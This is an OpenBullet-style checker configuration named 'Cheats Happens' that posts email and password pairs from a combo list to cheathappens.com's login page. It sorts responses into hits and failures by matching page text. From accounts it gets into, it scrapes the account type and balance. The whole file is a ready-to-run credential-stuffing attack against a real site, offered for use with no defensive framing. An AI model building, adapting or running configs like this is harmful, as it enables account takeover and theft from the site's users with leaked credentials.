[SETTINGS]
{
  "Name": "Cheats Happens",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-23T17:08:23.4468339-07:00",
  "AdditionalInfo": "",
  "Author": "Dr.Amr ",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Let's_Fuck_This_Site REQUEST POST "https://www.cheathappens.com/chcaptchalogin.asp" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "We're sorry, the Email you entered does not exist in our database." 
    KEY "We're sorry, the password you entered does not match what we have on file" 
  KEYCHAIN Success OR 
    KEY "MY FRIENDS" 

#Type_Of_Account_ PARSE "<SOURCE>" LR "<font color=\"#ffd700\">" "<" -> CAP "==Type== :: " 

#Balance_ PARSE "<SOURCE>" LR "\"color: #ebc102;\"><u>" "<" -> CAP "'==BALANCE==' =" 

#Type_Of_Account_ PARSE "<SOURCE>" LR "<font color=\"#3cb878\">" "<" -> CAP "" 

